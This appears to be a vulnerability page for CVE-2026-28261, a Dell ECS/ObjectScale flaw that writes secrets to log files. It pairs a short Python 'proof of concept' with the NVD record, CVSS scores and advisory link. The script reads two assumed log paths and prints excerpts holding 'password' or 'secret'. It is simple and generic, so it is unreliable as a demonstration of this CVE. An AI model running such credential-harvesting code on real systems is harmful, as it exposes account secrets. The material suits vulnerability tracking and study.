CVE-2026-28261

# Proof of Concept for CVE-2026-28261 # This script demonstrates a local attacker searching for sensitive data in logs. import os # Simulated log file paths for Dell products LOG_PATHS = [ "/var/log/dell/objectscale/audit.log", "/var/log/dell/ecs/system.log" ] def exploit(): print("[*] Attempting to read log files...") for path in LOG_PATHS: if os.path.exists(path): try: with open(path, 'r') as f: content = f.read() # Check for common sensitive patterns if "password" in content or "secret" in content: print(f"[!] Potential sensitive data found in: {path}") print(f"[+] Excerpt: {content[:100]}...") return True except PermissionError: print(f"[-] Permission denied for {path}") print("[-] No sensitive data found in default paths.") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-28261", "sourceIdentifier": "[email protected]", "published": "2026-04-08T13:16:41.533", "lastModified": "2026-04-13T18:20:21.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with privileges of the compromised account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:elastic_cloud_storage:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2.0.1", "matchCriteriaId": "950FB7D3-F08F-4FB1-8755-B0BE20AF7299"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:objectscale:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.0.3", "matchCriteriaId": "748662DA-E2CE-45DB-B05E-0C91B27FF232"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:objectscale:4.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "811FBEA7-6305-4DC7-B082-51C3A78C192D"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}